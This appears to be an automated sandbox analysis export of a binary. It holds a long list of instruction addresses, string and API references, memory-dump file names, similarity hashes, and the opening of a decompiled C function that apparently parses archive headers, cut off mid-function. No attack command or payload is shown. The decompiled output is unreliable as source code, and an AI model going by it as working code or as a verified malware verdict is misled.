0x0028c63c
0x0028c642
0x0028c64a
0x0028c650
0x0028c65a
0x0028c65a
0x0028c65d
0x0028c665
0x0028c66c
0x0028c66c
0x0028c65f
0x0028c65f
0x0028c661
0x0028c674
0x0028c67a
0x0028c67c
0x0028c680
0x0028c685
0x0028c692
0x0028c694
0x0028c69a
0x0028c69f
0x0028c6a0
0x0028c6a1
0x0028c6ab
0x0028c6b0
0x0028c6b6
0x0028c6bb
0x0028c6c4
0x0028c6c4
0x0028c6c6
0x0028c6bd
0x0028c6bd
0x0028c6c2
0x00000000
0x00000000
0x0028c6c2
0x0028c6cc
0x0028c6d4
0x0028c6d6
0x0028c6df
0x0028c6e0
0x0028c6e6
0x0028c6e8
0x0028cadb
0x0028cae1
0x0028cc00
0x0028cc00
0x0028cc07
0x0028cc07
0x0028cc07
0x0028cc0e
0x0028cc11
0x0028cc18
0x0028cc18
0x0028cc13
0x0028cc13
0x0028cc13
0x0028cc1c
0x0028cc1d
0x0028cc1f
0x0028cc22
0x0028cc25
0x0028cc28
0x0028cc2e
0x0028cc31
0x0028cc34
0x0028cc3e
0x0028cc3e
0x0028cc3e
0x0028cc36
0x0028cc36
0x0028cc38
0x00000000
0x0028cc3a
0x0028cc3a
0x0028cc3a
0x0028cc38
0x0028cc40
0x0028cc42
0x0028cce3
0x0028cce3
0x0028ccf0
0x0028ccf0
0x0028ccf0
0x0028cd06
0x0028cd0b
0x0028cc48
0x0028cc48
0x0028cc4a
0x00000000
0x0028cc50
0x0028cc52
0x0028cc53
0x0028cc55
0x0028cc57
0x0028cc57
0x0028cc59
0x0028cc5c
0x0028cc64
0x0028cc66
0x0028cc69
0x0028cc6f
0x0028cc6f
0x0028cc71
0x0028cc7d
0x0028cc7d
0x0028cc7d
0x0028cc73
0x0028cc75
0x0028cc75
0x0028cc84
0x0028cc87
0x0028cc89
0x0028cc90
0x0028cc90
0x0028cc8b
0x0028cc8b
0x0028cc8b
0x0028cc98
0x0028cca2
0x0028cca8
0x0028cca9
0x0028ccae
0x0028ccb4
0x0028ccb7
0x00000000
0x00000000
0x0028ccb9
0x0028ccb9
0x0028ccc1
0x0028ccc1
0x0028ccc7
0x0028ccce
0x0028ccdb
0x0028ccd0
0x0028ccd0
0x0028ccd3
0x0028ccd3
0x0028ccce
0x0028cc4a
0x0028cd17
0x0028cd27
0x0028cd34
0x0028cd36
0x0028cd3d
0x0028cae7
0x0028cae7
0x0028caf0
0x0028caf1
0x0028cafb
0x0028cb01
0x0028cb03
0x0028cb09
0x0028cb09
0x0028cb0b
0x0028cb0b
0x0028cb12
0x0028cb19
0x00000000
0x00000000
0x0028cb1f
0x0028cb22
0x0028cb25
0x00000000
0x0028cb27
0x0028cb27
0x0028cb27
0x0028cb27
0x0028cb2e
0x0028cb31
0x0028cb38
0x0028cb38
0x0028cb33
0x0028cb33
0x0028cb33
0x0028cb3c
0x0028cb3f
0x0028cb41
0x0028cb43
0x0028cb49
0x0028cb4f
0x0028cb51
0x0028cb51
0x0028cb51
0x0028cb58
0x0028cb58
0x0028cb5a
0x0028cb66
0x0028cb66
0x0028cb66
0x0028cb5c
0x0028cb5e
0x0028cb5e
0x0028cb6d
0x0028cb70
0x0028cb72
0x0028cb79
0x0028cb79
0x0028cb74
0x0028cb74
0x0028cb74
0x0028cb81
0x0028cb8c
0x0028cb92
0x0028cb93
0x0028cb98
0x0028cb9e
0x0028cba1
0x00000000
0x00000000
0x0028cba3
0x0028cba3
0x0028cbad
0x0028cbb8
0x0028cbc0
0x0028cbc6
0x0028cbd1
0x0028cbd7
0x0028cbde
0x0028cbf1
0x0028cbf8
0x0028cbf8
0x00000000
0x0028cb25
0x0028cb0b
0x00000000
0x0028cb03
0x0028cd40
0x0028cd40
0x0028cd46
0x0028cd4b
0x0028cd51
0x0028cd64
0x0028cd69
0x0028c6ee
0x0028c6ee
0x0028c6f7
0x0028c6f8
0x0028c702
0x0028c708
0x0028c70a
0x0028c910
0x0028c918
0x0028c91b
0x0028c920
0x0028c923
0x0028c92b
0x0028c92f
0x0028c935
0x0028c93b
0x0028c940
0x0028c947
0x0028c948
0x0028c948
0x0028c948
0x0028c94f
0x0028c952
0x0028c95a
0x0028c960
0x0028c965
0x0028c965
0x0028c962
0x0028c962
0x0028c962
0x0028c969
0x0028c96a
0x0028c96c
0x0028c96f
0x0028c975
0x0028c97b
0x0028c97e
0x0028c981
0x0028c987
0x0028c98a
0x0028c98d
0x0028c997
0x0028c997
0x0028c997
0x0028c98f
0x0028c98f
0x0028c991
0x00000000
0x0028c993
0x0028c993
0x0028c993
0x0028c991
0x0028c999
0x0028c99b
0x0028ca8d
0x0028ca8d
0x0028ca8f
0x0028ca95
0x0028ca9b
0x0028cab0
0x0028cab5
0x0028c9a1
0x0028c9a1
0x0028c9a3
0x00000000
0x0028c9a9
0x0028c9ab
0x0028c9ac
0x0028c9ae
0x0028c9b0
0x0028c9b2
0x0028c9b2
0x0028c9b8
0x0028c9ba
0x0028c9c0
0x0028c9c3
0x0028c9d1
0x0028c9d7
0x0028c9d7
0x0028c9d9
0x0028c9dc
0x0028c9e2
0x0028c9e2
0x0028c9e4
0x00000000
0x00000000
0x0028c9e6
0x0028c9e8
0x0028c9ee
0x0028c9ee
0x0028c9ea
0x0028c9ea
0x0028c9ea
0x0028c9f3
0x0028c9f5
0x0028c9fc
0x0028c9fc
0x0028c9f7
0x0028c9f7
0x0028c9f7
0x0028ca22
0x0028ca28
0x0028ca2b
0x0028ca31
0x0028ca38
0x0028ca39
0x0028ca3a
0x0028ca40
0x0028ca43
0x0028ca45
0x00000000
0x0028ca45
0x00000000
0x0028ca43
0x0028ca4d
0x0028ca53
0x0028ca5b
0x0028ca5b
0x0028ca5c
0x0028ca5e
0x0028ca62
0x0028ca6a
0x0028ca6a
0x0028ca6a
0x0028ca6c
0x0028ca73
0x0028ca78
0x0028ca85
0x0028ca7a
0x0028ca7d
0x0028ca7d
0x0028ca78
0x0028c9a3
0x0028cab8
0x0028cac2
0x0028cac8
0x0028cace
0x0028cad4
0x0028c710
0x0028c710
0x0028c710
0x0028c712
0x0028c719
0x0028c720
0x00000000
0x00000000
0x0028c726
0x0028c729
0x0028c72c
0x00000000
0x0028c72e
0x0028c736
0x0028c73b
0x0028c740
0x0028c741
0x0028c743
0x0028c74b
0x0028c74f
0x0028c755
0x0028c75b
0x0028c760
0x0028c767
0x0028c767
0x0028c768
0x0028c76b
0x0028c773
0x0028c779
0x0028c77e
0x0028c77e
0x0028c77b
0x0028c77b
0x0028c77b
0x0028c782
0x0028c783
0x0028c785
0x0028c788
0x0028c78e
0x0028c794
0x0028c797
0x0028c79a
0x0028c7a0
0x0028c7a3
0x0028c7a6
0x0028c7b0
0x0028c7b0
0x0028c7b0
0x0028c7a8
0x0028c7a8
0x0028c7aa
0x00000000
0x0028c7ac
0x0028c7ac
0x0028c7ac
0x0028c7aa
0x0028c7b2
0x0028c7b4
0x0028c8a9
0x0028c8a9
0x0028c8ab
0x0028c8b1
0x0028c8b7
0x0028c8cc
0x0028c8d1
0x0028c7ba
0x0028c7ba
0x0028c7bc
0x00000000
0x0028c7c2
0x0028c7c4
0x0028c7c5
0x0028c7c7
0x0028c7c9
0x0028c7cb
0x0028c7cb
0x0028c7d1
0x0028c7d3
0x0028c7d9
0x0028c7dc
0x0028c7ea
0x0028c7f0
0x0028c7f0
0x0028c7f2
0x0028c7f5
0x0028c7fb
0x0028c7fb
0x0028c7fd
0x00000000
0x00000000
0x0028c7ff
0x0028c801
0x0028c807
0x0028c807
0x0028c803
0x0028c803
0x0028c803
0x0028c80c
0x0028c80e
0x0028c81b
0x0028c81b
0x0028c810
0x0028c816
0x0028c816
0x0028c839
0x0028c841
0x0028c848
0x0028c84f
0x0028c850
0x0028c853
0x0028c859
0x0028c85f
0x0028c862
0x0028c864
0x00000000
0x0028c864
0x00000000
0x0028c862
0x0028c86c
0x0028c872
0x0028c872
0x0028c878
0x0028c87a
0x0028c884
0x0028c886
0x0028c886
0x0028c886
0x0028c888
0x0028c88f
0x0028c894
0x0028c8a1
0x0028c896
0x0028c899
0x0028c899
0x0028c894
0x0028c7bc
0x0028c8d4
0x0028c8df
0x0028c8e0
0x0028c8e1
0x0028c8e7
0x0028c8ed
0x0028c8f3
0x0028c8f3
0x00000000
0x0028c72c
0x00000000
0x0028c712
0x0028c8f4
0x0028c8fa
0x0028c901
0x0028c902
0x0028c903
0x0028c908
0x0028c908
0x0028cd6c
0x0028cd76
0x0028cd77
0x0028cd7d
0x0028cd7f
0x0028d1e8
0x0028d1ea
0x0028d1ec
0x0028d1f2
0x0028d1f4
0x0028d1fa
0x0028d1fc
0x0028d54e
0x0028d54e
0x0028d550
0x0028d556
0x0028d55d
0x0028d563
0x0028d565
0x0028d603
0x0028d603
0x0028d605
0x0028d606
0x0028d60c
0x00000000
0x0028d56b
0x0028d56b
0x0028d56e
0x0028d574
0x0028d57a
0x0028d57c
0x0028d582
0x0028d584
0x0028d584
0x0028d586
0x0028d586
0x0028d58f
0x0028d596
0x0028d59c
0x0028d59f
0x0028d5a0
0x0028d5a2
0x0028d5a2
0x0028d5a6
0x0028d5a8
0x0028d5aa
0x0028d5b0
0x0028d5b3
0x00000000
0x0028d5b5
0x0028d5b5
0x0028d5bc
0x0028d5bc
0x0028d5b3
0x0028d5a8
0x0028d57c
0x0028d56e
0x0028d565
0x0028d202
0x0028d202
0x0028d202
0x0028d205
0x0028d209
0x0028d209
0x0028d20a
0x0028d21c
0x0028d229
0x0028d238
0x0028d262
0x0028d267
0x0028d26d
0x0028d270
0x0028d276
0x0028d279
0x0028d312
0x0028d319
0x0028d397
0x0028d39d
0x0028d3a3
0x0028d3a6
0x0028d3a8
0x0028d431
0x0028d3ae
0x0028d3ae
0x0028d3b4
0x0028d3b4
0x0028d3ba
0x0028d3c0
0x0028d3c2
0x0028d3c4
0x0028d3c4
0x0028d3ca
0x0028d3d0
0x0028d3d2
0x0028d3da
0x0028d3da
0x0028d3e0
0x0028d3e2
0x0028d3e4
0x0028d3ea
0x0028d3ec
0x0028d503
0x0028d505
0x0028d50b
0x0028d50b
0x0028d50e
0x0028d50f
0x00000000
0x0028d3f2
0x0028d3f8
0x0028d3f8
0x0028d3fa
0x0028d400
0x0028d403
0x0028d40a
0x0028d410
0x0028d412
0x0028d439
0x0028d43b
0x0028d43d
0x0028d43f
0x0028d445
0x0028d44b
0x0028d4e5
0x0028d4e5
0x0028d4e8
0x00000000
0x0028d4ee
0x0028d4ee
0x0028d4f4
0x00000000
0x0028d4f4
0x0028d451
0x0028d451
0x0028d451
0x0028d454
0x00000000
0x00000000
0x0028d456
0x0028d458
0x0028d45a
0x0028d463
0x0028d463
0x0028d465
0x0028d46b
0x0028d46b
0x0028d477
0x0028d482
0x0028d485
0x0028d492
0x0028d495
0x0028d496
0x0028d497
0x0028d49d
0x0028d49f
0x0028d4a5
0x0028d4ab
0x00000000
0x00000000
0x00000000
0x00000000
0x0028d4ad
0x0028d4ad
0x0028d4ad
0x0028d4af
0x00000000
0x00000000
0x0028d4b1
0x0028d4b4
0x00000000
0x0028d4ba
0x0028d4ba
0x0028d4bc
0x0028d4be
0x0028d4be
0x0028d4be
0x0028d4c6
0x0028d4c9
0x0028d4c9
0x0028d4cf
0x0028d4d1
0x0028d4d3
0x0028d4da
0x0028d4e0
0x0028d4e2
0x00000000
0x0028d4e2
0x00000000
0x0028d4b4
0x00000000
0x0028d4ad
0x00000000
0x0028d451
0x0028d414
0x0028d414
0x0028d416
0x0028d41c
0x0028d423
0x0028d423
0x0028d426
0x0028d426
0x00000000
0x0028d416
0x00000000
0x0028d4fa
0x0028d4fa
0x0028d4fb
0x0028d4fb
0x00000000
0x0028d400
0x0028d31b
0x0028d31b
0x0028d32d
0x0028d33c
0x0028d341
0x0028d344
0x0028d346
0x00000000
0x0028d34c
0x0028d34c
0x0028d34f
0x00000000
0x0028d355
0x0028d355
0x0028d35c
0x00000000
0x0028d362
0x0028d368
0x0028d36a
0x0028d370
0x0028d370
0x0028d372
0x0028d372
0x0028d374
0x0028d37d
0x0028d384
0x0028d387
0x0028d388
0x0028d38a
0x0028d38a
0x00000000
0x0028d392
0x0028d35c
0x0028d34f
0x0028d346
0x0028d27f
0x0028d27f
0x0028d285
0x0028d287
0x0028d2a3
0x0028d2a6
0x00000000
0x0028d2ac
0x0028d2ac
0x0028d2b3
0x00000000
0x0028d2b9
0x0028d2bf
0x0028d2c1
0x0028d2c7
0x0028d2c7
0x0028d2c9
0x0028d2c9
0x0028d2cb
0x0028d2d4
0x0028d2db
0x0028d2de
0x0028d2df
0x0028d2e1
0x0028d2e1
0x0028d2e9
0x0028d2e9
0x0028d2eb
0x00000000
0x0028d2f1
0x0028d2f1
0x0028d2f7
0x0028d2fa
0x0028d5c4
0x0028d5c7
0x0028d5cd
0x0028d5e2
0x0028d5e7
0x0028d5ea
0x0028d300
0x0028d300
0x0028d307
0x00000000
0x0028d307
0x0028d2fa
0x0028d2eb
0x0028d2b3
0x0028d289
0x0028d289
0x0028d28b
0x0028d291
0x0028d297
0x0028d298
0x0028d515
0x0028d515
0x0028d51c
0x0028d51d
0x0028d51e
0x0028d523
0x0028d526
0x0028d526
0x0028d526
0x0028d287
0x0028d528
0x0028d528
0x0028d52a
0x0028d5f1
0x0028d5f8
0x0028d5ff
0x0028d612
0x0028d618
0x0028d619
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0028d530
0x0028d536
0x0028d536
0x0028d53c
0x0028d53c
0x0028d548
0x00000000
0x0028d548
0x0028cd85
0x0028cd85
0x0028cd87
0x0028cd8d
0x0028cd8f
0x0028cd95
0x0028cd97
0x0028d10e
0x0028d10e
0x0028d110
0x0028d116
0x0028d11d
0x0028d11f
0x0028d17e
0x0028d181
0x0028d187
0x0028d18d
0x0028d193
0x0028d195
0x0028d19b
0x0028d19d
0x0028d19d
0x0028d19f
0x0028d19f
0x0028d1a1
0x0028d1aa
0x0028d1b1
0x0028d1b4
0x0028d1b5
0x0028d1b7
0x0028d1b7
0x0028d1bf
0x0028d1c1
0x0028d1c7
0x0028d1cd
0x0028d1d0
0x00000000
0x0028d1d6
0x0028d1d6
0x0028d1dd
0x0028d1dd
0x0028d1d0
0x0028d1c1
0x0028d195
0x0028d121
0x0028d121
0x0028d123
0x0028d129
0x0028d12f
0x00000000
0x0028d12f
0x0028d11f
0x0028cd9d
0x0028cd9d
0x0028cd9d
0x0028cda0
0x0028cda4
0x0028cda4
0x0028cda5
0x0028cdb7
0x0028cdc4
0x0028cdd3
0x0028cdfd
0x0028ce02
0x0028ce08
0x0028ce0b
0x0028ce11
0x0028ce14
0x0028ce90
0x0028ce97
0x0028cf5b
0x0028cf61
0x0028cf67
0x0028cf6a
0x0028cf6c
0x0028cff5
0x0028cf72
0x0028cf72
0x0028cf78
0x0028cf78
0x0028cf7e
0x0028cf84
0x0028cf86
0x0028cf88
0x0028cf88
0x0028cf8e
0x0028cf94
0x0028cf96
0x0028cf9e
0x0028cf9e
0x0028cfa4
0x0028cfa6
0x0028cfa8
0x0028cfae
0x0028cfb0
0x0028d0c7
0x0028d0c9
0x0028d0cf
0x0028d0cf
0x00000000
0x0028cfb6
0x0028cfbc
0x0028cfbc
0x0028cfbe
0x0028cfc4
0x0028cfc7
0x0028cfce
0x0028cfd4
0x0028cfd6
0x0028cffd
0x0028cfff
0x0028d001
0x0028d003
0x0028d009
0x0028d00f
0x0028d0a9
0x0028d0a9
0x0028d0ac
0x00000000
0x0028d0b2
0x0028d0b2
0x0028d0b8
0x00000000
0x0028d0b8
0x0028d015
0x0028d015
0x0028d015
0x0028d018
0x00000000
0x00000000
0x0028d01a
0x0028d01c
0x0028d01e
0x0028d027
0x0028d027
0x0028d029
0x0028d02f
0x0028d02f
0x0028d03b
0x0028d046
0x0028d049
0x0028d056
0x0028d059
0x0028d05a
0x0028d05b
0x0028d061
0x0028d063
0x0028d069
0x0028d06f
0x00000000
0x00000000
0x00000000
0x00000000
0x0028d071
0x0028d071
0x0028d071
0x0028d073
0x00000000
0x00000000
0x0028d075
0x0028d078
0x0028d132
0x0028d132
0x0028d134
0x0028d13a
0x0028d140
0x0028d141
0x00000000
0x0028d07e
0x0028d07e
0x0028d080
0x0028d082
0x0028d082
0x0028d082
0x0028d08a
0x0028d08d
0x0028d08d
0x0028d093
0x0028d095
0x0028d097
0x0028d09e
0x0028d0a4
0x0028d0a6
0x00000000
0x0028d0a6
0x00000000
0x0028d078
0x00000000
0x0028d071
0x00000000
0x0028d015
0x0028cfd8
0x0028cfd8
0x0028cfda
0x0028cfe0
0x0028cfe7
0x0028cfe7
0x0028cfea
0x0028cfea
0x00000000
0x0028cfda
0x00000000
0x0028d0be
0x0028d0be
0x0028d0bf
0x0028d0bf
0x00000000
0x0028cfc4
0x0028ce9d
0x0028ce9d
0x0028ceaf
0x0028cebe
0x0028cec3
0x0028cec6
0x0028cec8
0x0028cee4
0x0028cee7
0x00000000
0x0028ceed
0x0028ceed
0x0028cef4
0x00000000
0x0028cefa
0x0028cf00
0x0028cf02
0x0028cf08
0x0028cf08
0x0028cf0a
0x0028cf0a
0x0028cf0c
0x0028cf15
0x0028cf1c
0x0028cf1f
0x0028cf20
0x0028cf22
0x0028cf22
0x00000000
0x0028cf0a
0x0028cef4
0x0028ceca
0x0028cecc
0x0028ced2
0x0028ced8
0x0028ced9
0x00000000
0x0028ced9
0x0028cec8
0x0028ce16
0x0028ce16
0x0028ce1c
0x0028ce1e
0x0028ce33
0x0028ce36
0x00000000
0x0028ce3c
0x0028ce3c
0x0028ce43
0x00000000
0x0028ce49
0x0028ce4f
0x0028ce51
0x0028ce57
0x0028ce57
0x0028ce59
0x0028ce59
0x0028ce5b
0x0028ce64
0x0028ce6b
0x0028ce6e
0x0028ce6f
0x0028ce71
0x0028ce71
0x0028cf2a
0x0028cf2a
0x0028cf2c
0x00000000
0x0028cf32
0x0028cf32
0x0028cf38
0x0028cf3b
0x0028ce7e
0x0028ce85
0x00000000
0x0028cf41
0x0028cf43
0x0028cf49
0x0028cf4f
0x0028cf50
0x0028d147
0x0028d147
0x0028d14e
0x0028d14f
0x0028d150
0x0028d155
0x0028d158
0x0028d158
0x0028cf3b
0x0028cf2c
0x0028ce43
0x0028ce20
0x0028ce20
0x0028ce22
0x0028ce28
0x0028d0d2
0x0028d0d2
0x0028d0d3
0x0028d0d9
0x0028d0d9
0x0028d0e0
0x0028d0e1
0x0028d0e2
0x0028d0e7
0x0028d0ea
0x0028d0ea
0x0028d0ea
0x0028ce1e
0x0028d0ec
0x0028d0ec
0x0028d0ee
0x0028d15c
0x0028d163
0x0028d163
0x0028d163
0x0028d16a
0x0028d16c
0x0028d172
0x0028d173
0x0028d61f
0x0028d61f
0x0028d620
0x0028d621
0x0028d626
0x00000000
0x00000000
0x00000000
0x00000000
0x0028d0f0
0x0028d0f6
0x0028d0f6
0x0028d0fc
0x0028d0fc
0x0028d108
0x00000000
0x0028d108
0x0028cd97
0x0028d629
0x0028d629
0x0028d62f
0x0028d631
0x0028d637
0x0028d63d
0x0028d63f
0x0028d641
0x0028d643
0x0028d643
0x0028d645
0x0028d645
0x0028d64e
0x0028d64f
0x0028d653
0x0028d65a
0x0028d65d
0x0028d65e
0x0028d660
0x0028d660
0x0028d664
0x0028d66a
0x0028d66c
0x0028d672
0x0028d674
0x0028d67a
0x0028d67d
0x0028d690
0x0028d693
0x0028d699
0x0028d6ae
0x0028d6b3
0x0028d67f
0x0028d681
0x0028d688
0x0028d688
0x0028d67d
0x0028d6b6
0x0028d6b6
0x0028d6c6
0x0028d6cf
0x0028d6d0
0x0028d6d2
0x0028d769
0x0028d76b
0x0028d776
0x0028d776
0x0028d778
0x0028d77b
0x0028d77d
0x00000000
0x0028d76d
0x0028d773
0x0028d773
0x0028d6d8
0x0028d6d8
0x0028d6de
0x0028d6e1
0x0028d6e7
0x0028d6ea
0x0028d6f0
0x0028d6f2
0x0028d6f8
0x0028d6fa
0x0028d6fc
0x0028d6fc
0x0028d6fe
0x0028d6fe
0x0028d70b
0x0028d712
0x0028d715
0x0028d716
0x0028d718
0x0028d719
0x0028d719
0x0028d71d
0x0028d723
0x0028d725
0x0028d727
0x0028d72d
0x0028d730
0x0028d744
0x0028d74a
0x0028d75f
0x0028d764
0x0028d732
0x0028d732
0x0028d739
0x0028d739
0x0028d730
0x0028d725
0x0028d783
0x0028d783
0x0028d783
0x0028d78f
0x0028d792
0x0028d798
0x0028d79a
0x0028d79c
0x0028d7a2
0x0028d7a4
0x0028d7a4
0x0028d7a4
0x0028d7a2
0x0028d7a9
0x0028d7aa
0x0028d7ac
0x0028d7ae
0x0028d7ae
0x0028d7b0
0x0028d7b6
0x0028d7bc
0x0028d7be
0x0028d7c4
0x0028d7c4
0x0028d7ca
0x0028d7cc
0x00000000
0x00000000
0x0028d7d2
0x0028d7d4
0x0028d7d6
0x0028d7d6
0x0028d7d8
0x0028d7d8
0x0028d7e8
0x0028d7ef
0x0028d7f2
0x0028d7f3
0x0028d7f5
0x0028d7f5
0x0028d7f9
0x0028d7ff
0x0028d801
0x0028d803
0x0028d809
0x0028d80c
0x0028d81d
0x0028d820
0x0028d826
0x0028d83b
0x0028d840
0x0028d80e
0x0028d80e
0x0028d815
0x0028d815
0x0028d80c
0x0028d851
0x0028d860
0x0028d861
0x0028d861
0x0028d863
0x0028d865
0x0028d865
0x0028d86b
0x0028d86e
0x0028d870
0x0028d872
0x0028d872
0x0028d875
0x0028d876
0x0028d876
0x0028d87b
0x0028d87e
0x0028d882
0x0028d882
0x0028d883
0x0028d885
0x0028d88b
0x0028d891
0x00000000
0x00000000
0x00000000
0x0028d891
0x0028d7c4
0x0028d897
0x0028d897
0x00000000
0x0028d897
0x0028c61c
0x0028c613
0x0028c60a
0x0028c5c1
0x0028c5c5
0x0028c5cd
0x00000000
0x0028c5cf
0x0028c5d5
0x0028c5da
0x0028d8b6
0x0028d8b6
0x0028d8b9
0x0028d8c4
0x0028d8ef
0x0028d8f0
0x0028d8f1
0x0028d8f2
0x0028d8f3
0x0028d8f4
0x0028d8f9
0x0028d901
0x0028d906
0x0028d90c
0x0028d911
0x0028d912
0x0028d912
0x0028d912
0x0028d918
0x0028d919
0x0028d919
0x0028d91c
0x0028d922
0x00000000
0x00000000
0x0028d924
0x0028d929
0x0028d92c
0x0028d92e
0x0028d936
0x0028d938
0x0028d93a
0x0028d93f
0x0028d942
0x0028d948
0x0028d94b
0x0028d94d
0x0028d94d
0x0028d94d
0x0028d94d
0x0028d94b
0x0028d950
0x0028d95c
0x0028d962
0x0028d96a
0x0028d96f
0x0028d970
0x0028d975
0x0028d975
0x0028d975
0x0028d975
0x0028d979
0x0028d979
0x0028d97c
0x0028d983
0x0028d990
0x0028d8c6
0x0028d8c6
0x0028d8c6
0x0028d8d0
0x0028d8d9
0x0028d8de
0x0028d8ec
0x0028d8ec
0x0028d8c4
0x0028c5cd

APIs

__floor_pentium4.LIBCMT ref: 0028C6A4

Strings

1#SNAN, xrefs: 0028D8A3
1#INF, xrefs: 0028D8B1
1#IND, xrefs: 0028D89C
1#QNAN, xrefs: 0028D8AA

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a2fd3d861fa3665873e1dc8cd629a706213b748c9d92437276aa37a199e10736
Instruction ID: 06be18b0bf8a6c9722125419101ff646e3bcab560e95167503d5a7ad2ba32b34
Opcode Fuzzy Hash: a2fd3d861fa3665873e1dc8cd629a706213b748c9d92437276aa37a199e10736
Instruction Fuzzy Hash: F3C27D75E296298FDF25EE28DD407E9B3B9EB44304F2441EAD40DE7280E774AE958F40

Uniqueness

Uniqueness Score: -1.00%

Function 00262692, Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 783
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00262692(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t333;
				signed int _t337;
				char _t356;
				signed short _t363;
				signed int _t368;
				signed int _t374;
				signed char _t376;
				signed char _t379;
				char _t396;
				signed int _t397;
				signed int _t401;
				signed char _t415;
				intOrPtr _t416;
				char _t417;
				signed int _t420;
				signed int _t421;
				signed char _t426;
				signed int _t429;
				signed int _t433;
				signed short _t438;
				signed short _t443;
				unsigned int _t448;
				signed int _t451;
				void* _t454;
				signed int _t456;
				signed int _t459;
				void* _t466;
				signed int _t472;
				unsigned int _t476;
				void* _t477;
				void* _t484;
				void* _t485;
				signed char _t491;
				signed int _t505;
				intOrPtr* _t518;
				signed int _t521;
				signed int _t522;
				intOrPtr* _t523;
				signed int _t531;
				signed int _t536;
				signed int _t538;
				unsigned int _t547;
				signed int _t549;
				signed int _t560;
				signed char _t562;
				signed int _t563;
				void* _t586;
				signed int _t590;
				signed int _t602;
				signed int _t604;
				signed int _t606;
				unsigned int _t612;
				signed char _t628;
				signed char _t638;
				signed int _t641;
				unsigned int _t642;
				signed int _t645;
				signed int _t646;
				signed int _t648;
				signed int _t649;
				unsigned int _t651;
				signed int _t655;
				void* _t656;
				void* _t663;
				signed int _t666;
				signed int _t667;
				signed char _t668;
				signed int _t671;
				void* _t673;
				signed int _t679;
				signed int _t680;
				void* _t685;
				signed int _t686;
				signed int _t687;
				signed int _t694;
				signed int _t695;
				intOrPtr _t697;
				void* _t698;
				signed char _t707;

				_t523 = __ecx;
				E0027D870(E00291197, _t698);
				E0027D940();
				_t518 = _t523;
				 *((intOrPtr*)(_t698 + 0x20)) = _t518;
				E0026C223(_t698 + 0x24, _t518);
				 *((intOrPtr*)(_t698 + 0x1c)) = 0;
				 *((intOrPtr*)(_t698 - 4)) = 0;
				_t655 = 7;
				if( *(_t518 + 0x6cbc) == 0) {
					L6:
					 *((char*)(_t698 + 0x5f)) = 0;
					L7:
					E0026C42E(_t638, _t655);
					if( *((intOrPtr*)(_t698 + 0x3c)) != 0) {
						 *(_t518 + 0x21e4) = E0026C269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f4) = 0;
						_t679 = E0026C251(_t698 + 0x24) & 0x000000ff;
						_t333 = E0026C269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21ec) = _t333;
						 *(_t518 + 0x21f4) = _t333 >> 0x0000000e & 0x00000001;
						_t531 = E0026C269(_t698 + 0x24) & 0x0000ffff;
						 *(_t518 + 0x21f0) = _t531;
						 *(_t518 + 0x21e8) = _t679;
						__eflags = _t531 - _t655;
						if(_t531 >= _t655) {
							_t680 = _t679 - 0x73;
							__eflags = _t680;
							if(_t680 == 0) {
								 *(_t518 + 0x21e8) = 1;
							} else {
								_t694 = _t680 - 1;
								__eflags = _t694;
								if(_t694 == 0) {
									 *(_t518 + 0x21e8) = 2;
								} else {
									_t695 = _t694 - 6;
									__eflags = _t695;
									if(_t695 == 0) {
										 *(_t518 + 0x21e8) = 3;
									} else {
										__eflags = _t695 == 1;
										if(_t695 == 1) {
											 *(_t518 + 0x21e8) = 5;
										}
									}
								}
							}
							_t337 =  *(_t518 + 0x21e8);
							 *(_t518 + 0x21dc) = _t337;
							__eflags = _t337 - 0x75;
							if(_t337 != 0x75) {
								__eflags = _t337 - 1;
								if(_t337 != 1) {
									L23:
									_push(_t531 - 7);
									L24:
									E0026C42E(_t638);
									 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca0)) + E00261901(_t518,  *(_t518 + 0x21f0));
									_t536 =  *(_t518 + 0x21e8);
									asm("adc eax, 0x0");
									 *(_t518 + 0x6cac) =  *(_t518 + 0x6ca4);
									 *(_t698 + 0x50) = _t536;
									__eflags = _t536 - 1;
									if(__eflags == 0) {
										_t656 = _t518 + 0x2208;
										E0026A96C(_t656);
										_t538 = 5;
										memcpy(_t656, _t518 + 0x21e4, _t538 << 2);
										 *(_t518 + 0x221c) = E0026C269(_t698 + 0x24);
										_t638 = E0026C29E(_t698 + 0x24);
										 *(_t518 + 0x2220) = _t638;
										 *(_t518 + 0x6cb5) =  *(_t518 + 0x2210) & 0x00000001;
										 *(_t518 + 0x6cb4) =  *(_t518 + 0x2210) >> 0x00000003 & 0x00000001;
										_t547 =  *(_t518 + 0x2210);
										 *(_t518 + 0x6cb7) = _t547 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x6cbb) = _t547 >> 0x00000006 & 0x00000001;
										 *(_t518 + 0x6cbc) = _t547 >> 0x00000007 & 0x00000001;
										__eflags = _t638;
										if(_t638 != 0) {
											L119:
											_t356 = 1;
											__eflags = 1;
											L120:
											 *((char*)(_t518 + 0x6cb8)) = _t356;
											 *(_t518 + 0x2224) = _t547 >> 0x00000001 & 0x00000001;
											_t549 = _t547 >> 0x00000004 & 0x00000001;
											__eflags = _t549;
											 *(_t518 + 0x6cb9) = _t547 >> 0x00000008 & 0x00000001;
											 *(_t518 + 0x6cba) = _t549;
											L121:
											_t655 = 7;
											L122:
											_t363 = E0026C34F(_t698 + 0x24, 0);
											__eflags =  *(_t518 + 0x21e4) - (_t363 & 0x0000ffff);
											if( *(_t518 + 0x21e4) == (_t363 & 0x0000ffff)) {
